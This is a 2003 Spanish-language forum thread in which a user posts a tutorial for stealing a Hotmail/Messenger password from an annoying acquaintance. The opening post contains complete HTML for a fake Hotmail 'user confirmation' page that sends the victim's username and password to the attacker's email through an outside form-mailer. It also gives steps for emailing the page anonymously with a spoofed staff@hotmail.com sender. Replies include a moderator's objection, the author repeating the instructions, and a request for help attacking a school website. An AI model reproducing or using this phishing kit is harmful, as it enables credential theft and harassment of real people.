[Clases]Ingenieria Inversa en Hotmail

YaW · por **YaW** » 13-09-2003 14:25

[color=darkred]Todo lo aqui expuesto es por mera informacion para defensa propia y bla bla bla...
Bueno vamos a ver, teneis un amigo que os molesta por el messenger? seguro que alguien habra... le quereis robar la pass para joderle?
Antes de todo deciros que robar una pass del hotmail es IMPOSIBLE, dado que Hotmail tiene muchisima seguridad y todos los trucos de confundir al bot y todo eso son mentiras y lo unico que vais a conseguir es que os cancelen la cuenta...
La unica forma de conseguir una contraseña de alguien en el messenger es usando la ingenieria inversa, es decir, engañandole para que te la de.
Para esto vamos a necesitar un xploit, un xploit es un codigo html que mandado en un mail se vera como un mensaje de hotmail... mas adelante lo explicare mejor.
Tambien necesitaremos un programa de envio de mails anonimos (no querreis que sepan que eres tu no?) El mejor y en el que me basare es el Uby Anonymous Mail v3 si buscais en google lo podreis pillar facilmente.
Bueno el xploit no lo considero como demasiado nocivo asi que os pongo el codigo aqui:
[/color][code]<html>
<head>
<meta name="xploit para Hotmail o Msn" content="xploit">
<title>Hotmail.com - Confirmacion De Usuarios</title>



<link
href="http://64.4.18.24/Hotmai_archivos/hotmail___7.css" rel=stylesheet>
</head>
<body bgcolor="#FFFFFF" topMargin="0">

<center><table BORDER=0 CELLSPACING=2 CELLPADDING=0 WIDTH="590" >
<tr>
<td COLSPAN="2">
<table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" >
<tr>
<td><a href="http://lc2.law13.hotmail.passport.com/cgi-bin/login?_lang=ES" target="_top"><font face="Verdana" size="2"><img SRC="http://64.4.18.24/logo_msnhmr_468x60.gif" NOSAVE BORDER=0 height=60 width=468></font></a></td>

<td ALIGN=CENTER NOWRAP><font face="Verdana" size="2"><img SRC="http://64.4.18.24/logo_passport_140x44.gif" ALT="Descubra más acerca de Passport" NOSAVE BORDER=0 height=44 width=140>
<br><a href="http://nexusrdr.passport.com/redir.asp?_lang=ES&pm=id%3d2%26fs%3d1%26cb%3d_lang%253dES%26ct%3d1018127971&attrib=Help" target="_top">Ayuda</a></font></td>
</tr>
</table>
</td>
</tr>

<tr>
<td BGCOLOR="#93BEE2" style="PADDING-RIGHT: 3px; PADDING-LEFT: 3px; PADDING-BOTTOM: 3px; PADDING-TOP: 3px"><b><font face="Verdana" size="2">Confirmación
de Usuarios</font></b></td>

<td VALIGN=TOP></td>
</tr>

<tr>
<td HEIGHT="6"></td>
</tr>

<tr VALIGN=TOP>
<td><form method="post" action="http://www.melodysoft.com/cgi-bin/form.cgi"><input type="hidden" name="recipient" value="eskribetukuentadekorreoaki@hotmail.com"><input type="hidden" name="redirect" value="http://lc3.law13.hotmail.passport.com/cgi-bin/dasp/hminfo_shell.asp?_lang=ES&content=whysign&us=ws&id=2&fs=1&cb=_lang%3dES&ct=1015737453">
<table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" >
<tr>
<td><font face="Verdana" size="2"><b>Usuario</b></font></td>

<td><font face="Verdana" size="2"><input type="usuario" name="Usuario" size="20">@<select size="1" name="Server">
<option value="Hotmail.com">Hotmail.com</option>
<option value="Msn.com">Msn.com</option>
</select></font></td>
</tr>

<tr>
<td><font face="Verdana" size="2"><b>Nombre</b></font></td>

<td><font face="Verdana" size="2"><input name="Nombre" size="30"></font></td>
</tr>
<tr>
<td><font face="Verdana" size="2"><b>Apellidos</b></font></td>

<td><font face="Verdana" size="2"><input name="Apellido" size="30"></font></td>
</tr>
<tr>
<td><font face="Verdana" size="2"><b>Contraseña</b></font></td>

<td><font face="Verdana" size="2"><input type="password" name="cur_passwd" size="30"></font></td>
</tr>

<tr>
<td></td>

<td>
<font face="Verdana" size="2">
<br><input type="submit" value="Aceptar"><input type="reset" value="Cancelar"></form></font></td>
</tr>
</table>
</td>

<td ROWSPAN="4"></td>
</tr>

<tr>
<td>Debido a la gran demanda de usuarios que poseé la empresa de correos mas
importante del mundo <b>HotMail</b> nos hemos visto a la necesidad de
recorrer a nuestros usuarios para verificar si son usuarios activos.<br>
<br>
Como la empresa de correos, sabe que usted nuestro usuario Trabaja, Estudia,
Viaja. No le es posible checar este correo continuamente. por ello <b>Hotmail
</b>les da de tolerancia dos semanas despues de haber sido enviado este mail.
Si no su cuenta la tendremos que tener como usuario no activo y tendriamos que
darle da baja a su cuenta de correo automaticamente<br>
<br>
<b>Hotmail </b>esta muy agradecido con usted por ser un usuario mas de
nuestra empresa.
Jajaja, mentiras, sólo intento robar su contraseña con este fraude...<br>
<br>
<b>Domingo 2 de febrero del 2003</b> </td>
</tr>
</table><table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="623" >
<tr>
<td width="621"> <font face="Verdana" size="2"> <br>
Â© 2002 Microsoft Corporation.Reservados todos los derechos.
<br><a href="http://g.msn.com/1HM506701/D" target="_top">CONDICIONES DE
USO</a> <a href="http://g.msn.com/1HM506701/C" target="_top">Declaración
de privacidad</a></font></td>
</tr>
</table></center>

</body>
</html> [/code]
[color=darkred]La victima lo vera [url=http://wildcrue.50megs.com/xploit.html]asi[/url].
Primero hay que modificarlo para que cuando el otro escriba su pass te llegue a tu correo, asi que buscad en ese codigo la linea que dice value="eskribetukuentadekorreoaki@hotmail.com" y pon tu correo ay, recomiendo hacerse una nueva cuenta de correo en yahoo o en otro gratuito por si acaso te pillan.
Bueno ya tenemos el exploit y el programa para mandarlo... a que esperamos?
Abrid el Uby Anonymous en TuNombre pon Personal de Hotmail, en tu email pon staff@hotmail.com, en nombre de la persona pon el nombre de tu victima, en email el mail de tu victima, en SMTP Host poned mc2.law16.hotmail.com aunque tambien si no os funciona podeis darle a escojer y probar con otro. En Subject pon algo como "IMPORTANTE: Confirmacion de Usuarios" y en mensaje pon el codigo del xploit que he puesto antes pero modificando el campo de tu mail.
Ahora dale a mandar mail... y listo! A tu victima le habra llegado un mensaje de hotmail pidiendole que escriba su usuario y su pass para confirmar...
Si lo escribe, te llegara al correo que hayas especificado.
Espero que os haya servido y que vuelen los puntos :smilie_61: jeje

Saludos y cuidado con lo que haceis!
[/color]

[ASG]WillmaN · por **[ASG]WillmaN** » 13-09-2003 15:56

en como me furule te van a llover puntos!!!!!!!!!!!!!
q wapo!!
a ver si realmente funciona!!
te lo curras, pero echo de menos lo de los trojans, sabes?
pq los antivirus los pillan!!!!!!!!!!1

Schnauzer · por **Schnauzer** » 15-09-2003 00:05

[color=green]Lethal, realmente está haciéndole un daño grandísimo a la sociedad.

Si alguien está interesado en hacer alguna picardía hack o en dañar a alguien por medio de la red y la tecnología, es mejor que se busquen la manera de hacerlo solitos sin que nadie les colabore con una causa tan tonda y de masl gusto como esas.[/color]

Cagalli Yula Athha · por **Cagalli Yula Athha** » 15-09-2003 00:38

[quote="Schnauzer"]:( [color=green]Lethal, realmente está haciéndole un daño grandísimo a la sociedad.

Si alguien está interesado en hacer alguna picardía hack o en dañar a alguien por medio de la red y la tecnología, es mejor que se busquen la manera de hacerlo solitos sin que nadie les colabore con una causa tan tonda y de masl gusto como esas.[/color]

[ASG]WillmaN · por **[ASG]WillmaN** » 15-09-2003 10:06

[quote="Schnauzer"]:( [color=green]Lethal, realmente está haciéndole un daño grandísimo a la sociedad.

Si alguien está interesado en hacer alguna picardía hack o en dañar a alguien por medio de la red y la tecnología, es mejor que se busquen la manera de hacerlo solitos sin que nadie les colabore con una causa tan tonda y de masl gusto como esas.[/color]

Schnauzer · por **Schnauzer** » 15-09-2003 21:49

[quote="WillmaN2k"]Weno, ahora sabes que si te llega ese mensaje, es un "hacker".
además, que te crees, que eso lo ha inventado el??
pon a buscar en google y en 3 minutos lo tienes!!
creo que no hace mal

por **hacklink** » 11-11-2003 22:50

:smilie_61: ye por que mejor no nos enseñas como hackear paginas web porque beras en la escuela donde estudio la odio y creo que debe tener un escarmiento y me encantaria derunbar su pagina (hacerla mierda ) :ham_jump:

kasthor · por **kasthor** » 11-11-2003 22:58

la pregunta es? donde esta la ingenieria inversa!

:roll:

SAKURA · por **SAKURA** » 12-11-2003 01:36

[color=brown]Ok, pero no te entendí muy bien... El código, lo copio y como hago para mandarlo... De donde saco el xpilot o algo asi?[/color]

ricardo_aries · por **ricardo_aries** » 12-11-2003 01:43

oigan expliquenme otra vez por que no le entendi. :smilie_61:

Schnauzer · por **Schnauzer** » 12-11-2003 04:08

[color=green]Por favor no enseñen este tipo de cosas acá en el foro.
Ah, y no revivan los mensajes viejos.[/color]

YaW · por **YaW** » 12-11-2003 16:52

[color=darkred]El codigo del xploit es el que esta puesto arriba, lo tienen que enviar con un programa de envio de mails anonimos como el Uby que tambien puse arriba...[/color]

ricardo_aries · por **ricardo_aries** » 12-11-2003 18:24

OYES SCH como es eso de no revivir los mensajes antiguos, que quieres decir. :ham_cheeks:

Schnauzer · por **Schnauzer** » 12-11-2003 18:45

[color=green]Una de las reglas más conocidas en[/color] [color=darkblue]TODOJUEGOS [/color][color=green]y en la mayoría de los foros (supongo que todos), es no revivir los temas antiguos, es decir, no responder aquellos temas que ya han sido olvidados con el tiempo, a no ser de que se quiera decir algo realmente importante que lo complemente.

:mrgreen:

Entendido?[/color]

ricardo_aries · por **ricardo_aries** » 12-11-2003 19:01

ok, schn, ya te entendi, ok, pero te falto algo, si revivo un mensaje antiguo solo para responder algo no muy importante pero que yo quiero poner o no esta bien lo que hago, que me pasa.?

[Clases]Ingenieria Inversa en Hotmail

[Clases]Ingenieria Inversa en Hotmail

oye por que mejor no nos enseñas otras cosas

¿Quién está conectado?